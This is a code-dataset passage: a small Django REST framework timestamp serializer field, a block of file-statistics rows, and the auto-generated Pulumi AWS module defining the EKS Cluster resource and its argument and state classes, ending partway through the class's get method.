class TimestampField(serializers.Field):
    """Serializer field that renders datetime values as POSIX timestamps.

    Outgoing (to_representation) values are converted via
    ``datetime.timestamp()``; incoming (to_internal_value) values are
    accepted as-is, with no parsing or validation performed here.
    """

    def to_representation(self, value):
        # Seconds since the Unix epoch, as a float.
        epoch_seconds = value.timestamp()
        return epoch_seconds

    def to_internal_value(self, value):
        # Pass the raw client-supplied value through unchanged.
        return value
| 24
| 40
| 0.736111
| 25
| 216
| 6.2
| 0.64
| 0.064516
| 0.193548
| 0.258065
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.194444
| 216
| 8
| 41
| 27
| 0.890805
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0.166667
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
b93941a5034968dc8c10b95b666ea8b33582e830
| 48,648
|
py
|
Python
|
sdk/python/pulumi_aws/eks/cluster.py
|
dmelo/pulumi-aws
|
dd1a08d1fb93bab0d046aa410ca660f05ca0a58c
|
[
"ECL-2.0",
"Apache-2.0"
] | 1
|
2021-11-10T16:33:40.000Z
|
2021-11-10T16:33:40.000Z
|
sdk/python/pulumi_aws/eks/cluster.py
|
dmelo/pulumi-aws
|
dd1a08d1fb93bab0d046aa410ca660f05ca0a58c
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_aws/eks/cluster.py
|
dmelo/pulumi-aws
|
dd1a08d1fb93bab0d046aa410ca660f05ca0a58c
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
from . import outputs
from ._inputs import *
__all__ = ['ClusterArgs', 'Cluster']
# NOTE(review): auto-generated by the Pulumi Terraform Bridge (tfgen);
# prefer regenerating over hand-editing this class.
@pulumi.input_type
class ClusterArgs:
    def __init__(__self__, *,
                 role_arn: pulumi.Input[str],
                 vpc_config: pulumi.Input['ClusterVpcConfigArgs'],
                 enabled_cluster_log_types: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
                 encryption_config: Optional[pulumi.Input['ClusterEncryptionConfigArgs']] = None,
                 kubernetes_network_config: Optional[pulumi.Input['ClusterKubernetesNetworkConfigArgs']] = None,
                 name: Optional[pulumi.Input[str]] = None,
                 tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
                 version: Optional[pulumi.Input[str]] = None):
        """
        The set of arguments for constructing a Cluster resource.
        :param pulumi.Input[str] role_arn: ARN of the IAM role that provides permissions for the Kubernetes control plane to make calls to AWS API operations on your behalf.
        :param pulumi.Input['ClusterVpcConfigArgs'] vpc_config: Configuration block for the VPC associated with your cluster. Amazon EKS VPC resources have specific requirements to work properly with Kubernetes. For more information, see [Cluster VPC Considerations](https://docs.aws.amazon.com/eks/latest/userguide/network_reqs.html) and [Cluster Security Group Considerations](https://docs.aws.amazon.com/eks/latest/userguide/sec-group-reqs.html) in the Amazon EKS User Guide. Detailed below. Also contains attributes detailed in the Attributes section.
        :param pulumi.Input[Sequence[pulumi.Input[str]]] enabled_cluster_log_types: List of the desired control plane logging to enable. For more information, see [Amazon EKS Control Plane Logging](https://docs.aws.amazon.com/eks/latest/userguide/control-plane-logs.html).
        :param pulumi.Input['ClusterEncryptionConfigArgs'] encryption_config: Configuration block with encryption configuration for the cluster. Only available on Kubernetes 1.13 and above clusters created after March 6, 2020. Detailed below.
        :param pulumi.Input['ClusterKubernetesNetworkConfigArgs'] kubernetes_network_config: Configuration block with kubernetes network configuration for the cluster. Detailed below. If removed, this provider will only perform drift detection if a configuration value is provided.
        :param pulumi.Input[str] name: Name of the cluster. Must be between 1-100 characters in length. Must begin with an alphanumeric character, and must only contain alphanumeric characters, dashes and underscores (`^[0-9A-Za-z][A-Za-z0-9\-_]+$`).
        :param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: Key-value map of resource tags.
        :param pulumi.Input[str] version: Desired Kubernetes master version. If you do not specify a value, the latest available version at resource creation is used and no upgrades will occur except those automatically triggered by EKS. The value must be configured and increased to upgrade the version when desired. Downgrades are not supported by EKS.
        """
        # Required inputs are always stored; optional inputs are stored only
        # when provided, so "unset" stays distinct from an explicit None.
        pulumi.set(__self__, "role_arn", role_arn)
        pulumi.set(__self__, "vpc_config", vpc_config)
        if enabled_cluster_log_types is not None:
            pulumi.set(__self__, "enabled_cluster_log_types", enabled_cluster_log_types)
        if encryption_config is not None:
            pulumi.set(__self__, "encryption_config", encryption_config)
        if kubernetes_network_config is not None:
            pulumi.set(__self__, "kubernetes_network_config", kubernetes_network_config)
        if name is not None:
            pulumi.set(__self__, "name", name)
        if tags is not None:
            pulumi.set(__self__, "tags", tags)
        if version is not None:
            pulumi.set(__self__, "version", version)

    @property
    @pulumi.getter(name="roleArn")
    def role_arn(self) -> pulumi.Input[str]:
        """
        ARN of the IAM role that provides permissions for the Kubernetes control plane to make calls to AWS API operations on your behalf.
        """
        return pulumi.get(self, "role_arn")

    @role_arn.setter
    def role_arn(self, value: pulumi.Input[str]):
        pulumi.set(self, "role_arn", value)

    @property
    @pulumi.getter(name="vpcConfig")
    def vpc_config(self) -> pulumi.Input['ClusterVpcConfigArgs']:
        """
        Configuration block for the VPC associated with your cluster. Amazon EKS VPC resources have specific requirements to work properly with Kubernetes. For more information, see [Cluster VPC Considerations](https://docs.aws.amazon.com/eks/latest/userguide/network_reqs.html) and [Cluster Security Group Considerations](https://docs.aws.amazon.com/eks/latest/userguide/sec-group-reqs.html) in the Amazon EKS User Guide. Detailed below. Also contains attributes detailed in the Attributes section.
        """
        return pulumi.get(self, "vpc_config")

    @vpc_config.setter
    def vpc_config(self, value: pulumi.Input['ClusterVpcConfigArgs']):
        pulumi.set(self, "vpc_config", value)

    @property
    @pulumi.getter(name="enabledClusterLogTypes")
    def enabled_cluster_log_types(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
        """
        List of the desired control plane logging to enable. For more information, see [Amazon EKS Control Plane Logging](https://docs.aws.amazon.com/eks/latest/userguide/control-plane-logs.html).
        """
        return pulumi.get(self, "enabled_cluster_log_types")

    @enabled_cluster_log_types.setter
    def enabled_cluster_log_types(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
        pulumi.set(self, "enabled_cluster_log_types", value)

    @property
    @pulumi.getter(name="encryptionConfig")
    def encryption_config(self) -> Optional[pulumi.Input['ClusterEncryptionConfigArgs']]:
        """
        Configuration block with encryption configuration for the cluster. Only available on Kubernetes 1.13 and above clusters created after March 6, 2020. Detailed below.
        """
        return pulumi.get(self, "encryption_config")

    @encryption_config.setter
    def encryption_config(self, value: Optional[pulumi.Input['ClusterEncryptionConfigArgs']]):
        pulumi.set(self, "encryption_config", value)

    @property
    @pulumi.getter(name="kubernetesNetworkConfig")
    def kubernetes_network_config(self) -> Optional[pulumi.Input['ClusterKubernetesNetworkConfigArgs']]:
        """
        Configuration block with kubernetes network configuration for the cluster. Detailed below. If removed, this provider will only perform drift detection if a configuration value is provided.
        """
        return pulumi.get(self, "kubernetes_network_config")

    @kubernetes_network_config.setter
    def kubernetes_network_config(self, value: Optional[pulumi.Input['ClusterKubernetesNetworkConfigArgs']]):
        pulumi.set(self, "kubernetes_network_config", value)

    @property
    @pulumi.getter
    def name(self) -> Optional[pulumi.Input[str]]:
        """
        Name of the cluster. Must be between 1-100 characters in length. Must begin with an alphanumeric character, and must only contain alphanumeric characters, dashes and underscores (`^[0-9A-Za-z][A-Za-z0-9\-_]+$`).
        """
        return pulumi.get(self, "name")

    @name.setter
    def name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "name", value)

    @property
    @pulumi.getter
    def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
        """
        Key-value map of resource tags.
        """
        return pulumi.get(self, "tags")

    @tags.setter
    def tags(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
        pulumi.set(self, "tags", value)

    @property
    @pulumi.getter
    def version(self) -> Optional[pulumi.Input[str]]:
        """
        Desired Kubernetes master version. If you do not specify a value, the latest available version at resource creation is used and no upgrades will occur except those automatically triggered by EKS. The value must be configured and increased to upgrade the version when desired. Downgrades are not supported by EKS.
        """
        return pulumi.get(self, "version")

    @version.setter
    def version(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "version", value)
# NOTE(review): auto-generated by the Pulumi Terraform Bridge (tfgen);
# prefer regenerating over hand-editing this class.
@pulumi.input_type
class _ClusterState:
    def __init__(__self__, *,
                 arn: Optional[pulumi.Input[str]] = None,
                 certificate_authority: Optional[pulumi.Input['ClusterCertificateAuthorityArgs']] = None,
                 created_at: Optional[pulumi.Input[str]] = None,
                 enabled_cluster_log_types: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
                 encryption_config: Optional[pulumi.Input['ClusterEncryptionConfigArgs']] = None,
                 endpoint: Optional[pulumi.Input[str]] = None,
                 identities: Optional[pulumi.Input[Sequence[pulumi.Input['ClusterIdentityArgs']]]] = None,
                 kubernetes_network_config: Optional[pulumi.Input['ClusterKubernetesNetworkConfigArgs']] = None,
                 name: Optional[pulumi.Input[str]] = None,
                 platform_version: Optional[pulumi.Input[str]] = None,
                 role_arn: Optional[pulumi.Input[str]] = None,
                 status: Optional[pulumi.Input[str]] = None,
                 tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
                 tags_all: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
                 version: Optional[pulumi.Input[str]] = None,
                 vpc_config: Optional[pulumi.Input['ClusterVpcConfigArgs']] = None):
        """
        Input properties used for looking up and filtering Cluster resources.
        :param pulumi.Input[str] arn: ARN of the cluster.
        :param pulumi.Input['ClusterCertificateAuthorityArgs'] certificate_authority: Attribute block containing `certificate-authority-data` for your cluster. Detailed below.
        :param pulumi.Input[str] created_at: Unix epoch timestamp in seconds for when the cluster was created.
        :param pulumi.Input[Sequence[pulumi.Input[str]]] enabled_cluster_log_types: List of the desired control plane logging to enable. For more information, see [Amazon EKS Control Plane Logging](https://docs.aws.amazon.com/eks/latest/userguide/control-plane-logs.html).
        :param pulumi.Input['ClusterEncryptionConfigArgs'] encryption_config: Configuration block with encryption configuration for the cluster. Only available on Kubernetes 1.13 and above clusters created after March 6, 2020. Detailed below.
        :param pulumi.Input[str] endpoint: Endpoint for your Kubernetes API server.
        :param pulumi.Input[Sequence[pulumi.Input['ClusterIdentityArgs']]] identities: Attribute block containing identity provider information for your cluster. Only available on Kubernetes version 1.13 and 1.14 clusters created or upgraded on or after September 3, 2019. Detailed below.
        :param pulumi.Input['ClusterKubernetesNetworkConfigArgs'] kubernetes_network_config: Configuration block with kubernetes network configuration for the cluster. Detailed below. If removed, this provider will only perform drift detection if a configuration value is provided.
        :param pulumi.Input[str] name: Name of the cluster. Must be between 1-100 characters in length. Must begin with an alphanumeric character, and must only contain alphanumeric characters, dashes and underscores (`^[0-9A-Za-z][A-Za-z0-9\-_]+$`).
        :param pulumi.Input[str] platform_version: Platform version for the cluster.
        :param pulumi.Input[str] role_arn: ARN of the IAM role that provides permissions for the Kubernetes control plane to make calls to AWS API operations on your behalf.
        :param pulumi.Input[str] status: Status of the EKS cluster. One of `CREATING`, `ACTIVE`, `DELETING`, `FAILED`.
        :param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: Key-value map of resource tags.
        :param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags_all: Map of tags assigned to the resource, including those inherited from the provider.
        :param pulumi.Input[str] version: Desired Kubernetes master version. If you do not specify a value, the latest available version at resource creation is used and no upgrades will occur except those automatically triggered by EKS. The value must be configured and increased to upgrade the version when desired. Downgrades are not supported by EKS.
        :param pulumi.Input['ClusterVpcConfigArgs'] vpc_config: Configuration block for the VPC associated with your cluster. Amazon EKS VPC resources have specific requirements to work properly with Kubernetes. For more information, see [Cluster VPC Considerations](https://docs.aws.amazon.com/eks/latest/userguide/network_reqs.html) and [Cluster Security Group Considerations](https://docs.aws.amazon.com/eks/latest/userguide/sec-group-reqs.html) in the Amazon EKS User Guide. Detailed below. Also contains attributes detailed in the Attributes section.
        """
        # Every state field is optional; store only those that were provided,
        # so "unset" stays distinct from an explicit None.
        if arn is not None:
            pulumi.set(__self__, "arn", arn)
        if certificate_authority is not None:
            pulumi.set(__self__, "certificate_authority", certificate_authority)
        if created_at is not None:
            pulumi.set(__self__, "created_at", created_at)
        if enabled_cluster_log_types is not None:
            pulumi.set(__self__, "enabled_cluster_log_types", enabled_cluster_log_types)
        if encryption_config is not None:
            pulumi.set(__self__, "encryption_config", encryption_config)
        if endpoint is not None:
            pulumi.set(__self__, "endpoint", endpoint)
        if identities is not None:
            pulumi.set(__self__, "identities", identities)
        if kubernetes_network_config is not None:
            pulumi.set(__self__, "kubernetes_network_config", kubernetes_network_config)
        if name is not None:
            pulumi.set(__self__, "name", name)
        if platform_version is not None:
            pulumi.set(__self__, "platform_version", platform_version)
        if role_arn is not None:
            pulumi.set(__self__, "role_arn", role_arn)
        if status is not None:
            pulumi.set(__self__, "status", status)
        if tags is not None:
            pulumi.set(__self__, "tags", tags)
        if tags_all is not None:
            pulumi.set(__self__, "tags_all", tags_all)
        if version is not None:
            pulumi.set(__self__, "version", version)
        if vpc_config is not None:
            pulumi.set(__self__, "vpc_config", vpc_config)

    @property
    @pulumi.getter
    def arn(self) -> Optional[pulumi.Input[str]]:
        """
        ARN of the cluster.
        """
        return pulumi.get(self, "arn")

    @arn.setter
    def arn(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "arn", value)

    @property
    @pulumi.getter(name="certificateAuthority")
    def certificate_authority(self) -> Optional[pulumi.Input['ClusterCertificateAuthorityArgs']]:
        """
        Attribute block containing `certificate-authority-data` for your cluster. Detailed below.
        """
        return pulumi.get(self, "certificate_authority")

    @certificate_authority.setter
    def certificate_authority(self, value: Optional[pulumi.Input['ClusterCertificateAuthorityArgs']]):
        pulumi.set(self, "certificate_authority", value)

    @property
    @pulumi.getter(name="createdAt")
    def created_at(self) -> Optional[pulumi.Input[str]]:
        """
        Unix epoch timestamp in seconds for when the cluster was created.
        """
        return pulumi.get(self, "created_at")

    @created_at.setter
    def created_at(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "created_at", value)

    @property
    @pulumi.getter(name="enabledClusterLogTypes")
    def enabled_cluster_log_types(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
        """
        List of the desired control plane logging to enable. For more information, see [Amazon EKS Control Plane Logging](https://docs.aws.amazon.com/eks/latest/userguide/control-plane-logs.html).
        """
        return pulumi.get(self, "enabled_cluster_log_types")

    @enabled_cluster_log_types.setter
    def enabled_cluster_log_types(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
        pulumi.set(self, "enabled_cluster_log_types", value)

    @property
    @pulumi.getter(name="encryptionConfig")
    def encryption_config(self) -> Optional[pulumi.Input['ClusterEncryptionConfigArgs']]:
        """
        Configuration block with encryption configuration for the cluster. Only available on Kubernetes 1.13 and above clusters created after March 6, 2020. Detailed below.
        """
        return pulumi.get(self, "encryption_config")

    @encryption_config.setter
    def encryption_config(self, value: Optional[pulumi.Input['ClusterEncryptionConfigArgs']]):
        pulumi.set(self, "encryption_config", value)

    @property
    @pulumi.getter
    def endpoint(self) -> Optional[pulumi.Input[str]]:
        """
        Endpoint for your Kubernetes API server.
        """
        return pulumi.get(self, "endpoint")

    @endpoint.setter
    def endpoint(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "endpoint", value)

    @property
    @pulumi.getter
    def identities(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['ClusterIdentityArgs']]]]:
        """
        Attribute block containing identity provider information for your cluster. Only available on Kubernetes version 1.13 and 1.14 clusters created or upgraded on or after September 3, 2019. Detailed below.
        """
        return pulumi.get(self, "identities")

    @identities.setter
    def identities(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['ClusterIdentityArgs']]]]):
        pulumi.set(self, "identities", value)

    @property
    @pulumi.getter(name="kubernetesNetworkConfig")
    def kubernetes_network_config(self) -> Optional[pulumi.Input['ClusterKubernetesNetworkConfigArgs']]:
        """
        Configuration block with kubernetes network configuration for the cluster. Detailed below. If removed, this provider will only perform drift detection if a configuration value is provided.
        """
        return pulumi.get(self, "kubernetes_network_config")

    @kubernetes_network_config.setter
    def kubernetes_network_config(self, value: Optional[pulumi.Input['ClusterKubernetesNetworkConfigArgs']]):
        pulumi.set(self, "kubernetes_network_config", value)

    @property
    @pulumi.getter
    def name(self) -> Optional[pulumi.Input[str]]:
        """
        Name of the cluster. Must be between 1-100 characters in length. Must begin with an alphanumeric character, and must only contain alphanumeric characters, dashes and underscores (`^[0-9A-Za-z][A-Za-z0-9\-_]+$`).
        """
        return pulumi.get(self, "name")

    @name.setter
    def name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "name", value)

    @property
    @pulumi.getter(name="platformVersion")
    def platform_version(self) -> Optional[pulumi.Input[str]]:
        """
        Platform version for the cluster.
        """
        return pulumi.get(self, "platform_version")

    @platform_version.setter
    def platform_version(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "platform_version", value)

    @property
    @pulumi.getter(name="roleArn")
    def role_arn(self) -> Optional[pulumi.Input[str]]:
        """
        ARN of the IAM role that provides permissions for the Kubernetes control plane to make calls to AWS API operations on your behalf.
        """
        return pulumi.get(self, "role_arn")

    @role_arn.setter
    def role_arn(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "role_arn", value)

    @property
    @pulumi.getter
    def status(self) -> Optional[pulumi.Input[str]]:
        """
        Status of the EKS cluster. One of `CREATING`, `ACTIVE`, `DELETING`, `FAILED`.
        """
        return pulumi.get(self, "status")

    @status.setter
    def status(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "status", value)

    @property
    @pulumi.getter
    def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
        """
        Key-value map of resource tags.
        """
        return pulumi.get(self, "tags")

    @tags.setter
    def tags(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
        pulumi.set(self, "tags", value)

    @property
    @pulumi.getter(name="tagsAll")
    def tags_all(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
        """
        Map of tags assigned to the resource, including those inherited from the provider.
        """
        return pulumi.get(self, "tags_all")

    @tags_all.setter
    def tags_all(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
        pulumi.set(self, "tags_all", value)

    @property
    @pulumi.getter
    def version(self) -> Optional[pulumi.Input[str]]:
        """
        Desired Kubernetes master version. If you do not specify a value, the latest available version at resource creation is used and no upgrades will occur except those automatically triggered by EKS. The value must be configured and increased to upgrade the version when desired. Downgrades are not supported by EKS.
        """
        return pulumi.get(self, "version")

    @version.setter
    def version(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "version", value)

    @property
    @pulumi.getter(name="vpcConfig")
    def vpc_config(self) -> Optional[pulumi.Input['ClusterVpcConfigArgs']]:
        """
        Configuration block for the VPC associated with your cluster. Amazon EKS VPC resources have specific requirements to work properly with Kubernetes. For more information, see [Cluster VPC Considerations](https://docs.aws.amazon.com/eks/latest/userguide/network_reqs.html) and [Cluster Security Group Considerations](https://docs.aws.amazon.com/eks/latest/userguide/sec-group-reqs.html) in the Amazon EKS User Guide. Detailed below. Also contains attributes detailed in the Attributes section.
        """
        return pulumi.get(self, "vpc_config")

    @vpc_config.setter
    def vpc_config(self, value: Optional[pulumi.Input['ClusterVpcConfigArgs']]):
        pulumi.set(self, "vpc_config", value)
class Cluster(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
enabled_cluster_log_types: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
encryption_config: Optional[pulumi.Input[pulumi.InputType['ClusterEncryptionConfigArgs']]] = None,
kubernetes_network_config: Optional[pulumi.Input[pulumi.InputType['ClusterKubernetesNetworkConfigArgs']]] = None,
name: Optional[pulumi.Input[str]] = None,
role_arn: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
version: Optional[pulumi.Input[str]] = None,
vpc_config: Optional[pulumi.Input[pulumi.InputType['ClusterVpcConfigArgs']]] = None,
__props__=None):
"""
Manages an EKS Cluster.
## Example Usage
### Basic Usage
```python
import pulumi
import pulumi_aws as aws
example = aws.eks.Cluster("example",
role_arn=aws_iam_role["example"]["arn"],
vpc_config=aws.eks.ClusterVpcConfigArgs(
subnet_ids=[
aws_subnet["example1"]["id"],
aws_subnet["example2"]["id"],
],
),
opts=pulumi.ResourceOptions(depends_on=[
aws_iam_role_policy_attachment["example-AmazonEKSClusterPolicy"],
aws_iam_role_policy_attachment["example-AmazonEKSVPCResourceController"],
]))
pulumi.export("endpoint", example.endpoint)
pulumi.export("kubeconfig-certificate-authority-data", example.certificate_authority.data)
```
### Example IAM Role for EKS Cluster
```python
import pulumi
import pulumi_aws as aws
example = aws.iam.Role("example", assume_role_policy=\"\"\"{
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Principal": {
"Service": "eks.amazonaws.com"
},
"Action": "sts:AssumeRole"
}
]
}
\"\"\")
example__amazon_eks_cluster_policy = aws.iam.RolePolicyAttachment("example-AmazonEKSClusterPolicy",
policy_arn="arn:aws:iam::aws:policy/AmazonEKSClusterPolicy",
role=example.name)
# Optionally, enable Security Groups for Pods
# Reference: https://docs.aws.amazon.com/eks/latest/userguide/security-groups-for-pods.html
example__amazon_eksvpc_resource_controller = aws.iam.RolePolicyAttachment("example-AmazonEKSVPCResourceController",
policy_arn="arn:aws:iam::aws:policy/AmazonEKSVPCResourceController",
role=example.name)
```
### Enabling Control Plane Logging
[EKS Control Plane Logging](https://docs.aws.amazon.com/eks/latest/userguide/control-plane-logs.html) can be enabled via the `enabled_cluster_log_types` argument. To manage the CloudWatch Log Group retention period, the `cloudwatch.LogGroup` resource can be used.
> The below configuration uses [`dependsOn`](https://www.pulumi.com/docs/intro/concepts/programming-model/#dependson) to prevent ordering issues with EKS automatically creating the log group first and a variable for naming consistency. Other ordering and naming methodologies may be more appropriate for your environment.
```python
import pulumi
import pulumi_aws as aws
config = pulumi.Config()
cluster_name = config.get("clusterName")
if cluster_name is None:
cluster_name = "example"
example_log_group = aws.cloudwatch.LogGroup("exampleLogGroup", retention_in_days=7)
# ... potentially other configuration ...
example_cluster = aws.eks.Cluster("exampleCluster", enabled_cluster_log_types=[
"api",
"audit",
],
opts=pulumi.ResourceOptions(depends_on=[example_log_group]))
# ... other configuration ...
```
## Import
EKS Clusters can be imported using the `name`, e.g.,
```sh
$ pulumi import aws:eks/cluster:Cluster my_cluster my_cluster
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[Sequence[pulumi.Input[str]]] enabled_cluster_log_types: List of the desired control plane logging to enable. For more information, see [Amazon EKS Control Plane Logging](https://docs.aws.amazon.com/eks/latest/userguide/control-plane-logs.html).
:param pulumi.Input[pulumi.InputType['ClusterEncryptionConfigArgs']] encryption_config: Configuration block with encryption configuration for the cluster. Only available on Kubernetes 1.13 and above clusters created after March 6, 2020. Detailed below.
:param pulumi.Input[pulumi.InputType['ClusterKubernetesNetworkConfigArgs']] kubernetes_network_config: Configuration block with kubernetes network configuration for the cluster. Detailed below. If removed, this provider will only perform drift detection if a configuration value is provided.
:param pulumi.Input[str] name: Name of the cluster. Must be between 1-100 characters in length. Must begin with an alphanumeric character, and must only contain alphanumeric characters, dashes and underscores (`^[0-9A-Za-z][A-Za-z0-9\-_]+$`).
:param pulumi.Input[str] role_arn: ARN of the IAM role that provides permissions for the Kubernetes control plane to make calls to AWS API operations on your behalf.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: Key-value map of resource tags.
:param pulumi.Input[str] version: Desired Kubernetes master version. If you do not specify a value, the latest available version at resource creation is used and no upgrades will occur except those automatically triggered by EKS. The value must be configured and increased to upgrade the version when desired. Downgrades are not supported by EKS.
:param pulumi.Input[pulumi.InputType['ClusterVpcConfigArgs']] vpc_config: Configuration block for the VPC associated with your cluster. Amazon EKS VPC resources have specific requirements to work properly with Kubernetes. For more information, see [Cluster VPC Considerations](https://docs.aws.amazon.com/eks/latest/userguide/network_reqs.html) and [Cluster Security Group Considerations](https://docs.aws.amazon.com/eks/latest/userguide/sec-group-reqs.html) in the Amazon EKS User Guide. Detailed below. Also contains attributes detailed in the Attributes section.
"""
...
@overload
def __init__(__self__,
             resource_name: str,
             args: ClusterArgs,
             opts: Optional[pulumi.ResourceOptions] = None):
    """
    Manages an EKS Cluster.

    ## Example Usage
    ### Basic Usage

    ```python
    import pulumi
    import pulumi_aws as aws

    example = aws.eks.Cluster("example",
        role_arn=aws_iam_role["example"]["arn"],
        vpc_config=aws.eks.ClusterVpcConfigArgs(
            subnet_ids=[
                aws_subnet["example1"]["id"],
                aws_subnet["example2"]["id"],
            ],
        ),
        opts=pulumi.ResourceOptions(depends_on=[
            aws_iam_role_policy_attachment["example-AmazonEKSClusterPolicy"],
            aws_iam_role_policy_attachment["example-AmazonEKSVPCResourceController"],
        ]))
    pulumi.export("endpoint", example.endpoint)
    pulumi.export("kubeconfig-certificate-authority-data", example.certificate_authority.data)
    ```

    The cluster requires an IAM role assumable by `eks.amazonaws.com` with the
    `AmazonEKSClusterPolicy` managed policy attached (and, optionally,
    `AmazonEKSVPCResourceController` to enable Security Groups for Pods — see
    https://docs.aws.amazon.com/eks/latest/userguide/security-groups-for-pods.html).

    [EKS Control Plane Logging](https://docs.aws.amazon.com/eks/latest/userguide/control-plane-logs.html)
    can be enabled via the `enabled_cluster_log_types` argument; to manage the
    CloudWatch Log Group retention period, the `cloudwatch.LogGroup` resource can
    be used together with
    [`dependsOn`](https://www.pulumi.com/docs/intro/concepts/programming-model/#dependson)
    to prevent ordering issues with EKS automatically creating the log group first.

    ## Import

    EKS Clusters can be imported using the `name`, e.g.,

    ```sh
    $ pulumi import aws:eks/cluster:Cluster my_cluster my_cluster
    ```

    :param str resource_name: The name of the resource.
    :param ClusterArgs args: The arguments to use to populate this resource's properties.
    :param pulumi.ResourceOptions opts: Options for the resource.
    """
    ...
def __init__(__self__, resource_name: str, *args, **kwargs):
    """Dispatch construction to `_internal_init`, accepting either a
    `ClusterArgs` bundle (positional `args`) or plain keyword arguments."""
    resource_args, opts = _utilities.get_resource_args_opts(
        ClusterArgs, pulumi.ResourceOptions, *args, **kwargs)
    if resource_args is None:
        # Caller passed individual keyword arguments; forward them untouched.
        __self__._internal_init(resource_name, *args, **kwargs)
    else:
        # Caller passed a ClusterArgs object; expand its fields as kwargs.
        __self__._internal_init(resource_name, opts, **resource_args.__dict__)
def _internal_init(__self__,
                   resource_name: str,
                   opts: Optional[pulumi.ResourceOptions] = None,
                   enabled_cluster_log_types: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
                   encryption_config: Optional[pulumi.Input[pulumi.InputType['ClusterEncryptionConfigArgs']]] = None,
                   kubernetes_network_config: Optional[pulumi.Input[pulumi.InputType['ClusterKubernetesNetworkConfigArgs']]] = None,
                   name: Optional[pulumi.Input[str]] = None,
                   role_arn: Optional[pulumi.Input[str]] = None,
                   tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
                   version: Optional[pulumi.Input[str]] = None,
                   vpc_config: Optional[pulumi.Input[pulumi.InputType['ClusterVpcConfigArgs']]] = None,
                   __props__=None):
    """Shared implementation behind both ``__init__`` overloads.

    Normalizes resource options, validates required inputs, builds the
    property bag, and registers the resource with the Pulumi engine.
    """
    # Normalize and validate resource options.
    if opts is None:
        opts = pulumi.ResourceOptions()
    if not isinstance(opts, pulumi.ResourceOptions):
        raise TypeError('Expected resource options to be a ResourceOptions instance')
    if opts.version is None:
        opts.version = _utilities.get_version()
    if opts.id is None:
        # Creating a brand-new resource: __props__ is reserved for lookups.
        if __props__ is not None:
            raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
        # Required inputs may only be omitted when rehydrating from a URN.
        if role_arn is None and not opts.urn:
            raise TypeError("Missing required property 'role_arn'")
        if vpc_config is None and not opts.urn:
            raise TypeError("Missing required property 'vpc_config'")
        __props__ = ClusterArgs.__new__(ClusterArgs)
        # Caller-supplied inputs, in declaration order.
        __props__.__dict__.update({
            "enabled_cluster_log_types": enabled_cluster_log_types,
            "encryption_config": encryption_config,
            "kubernetes_network_config": kubernetes_network_config,
            "name": name,
            "role_arn": role_arn,
            "tags": tags,
            "version": version,
            "vpc_config": vpc_config,
        })
        # Output-only attributes start as None; the provider fills them in.
        for computed in ("arn", "certificate_authority", "created_at",
                         "endpoint", "identities", "platform_version",
                         "status", "tags_all"):
            __props__.__dict__[computed] = None
    super(Cluster, __self__).__init__(
        'aws:eks/cluster:Cluster',
        resource_name,
        __props__,
        opts)
@staticmethod
def get(resource_name: str,
        id: pulumi.Input[str],
        opts: Optional[pulumi.ResourceOptions] = None,
        arn: Optional[pulumi.Input[str]] = None,
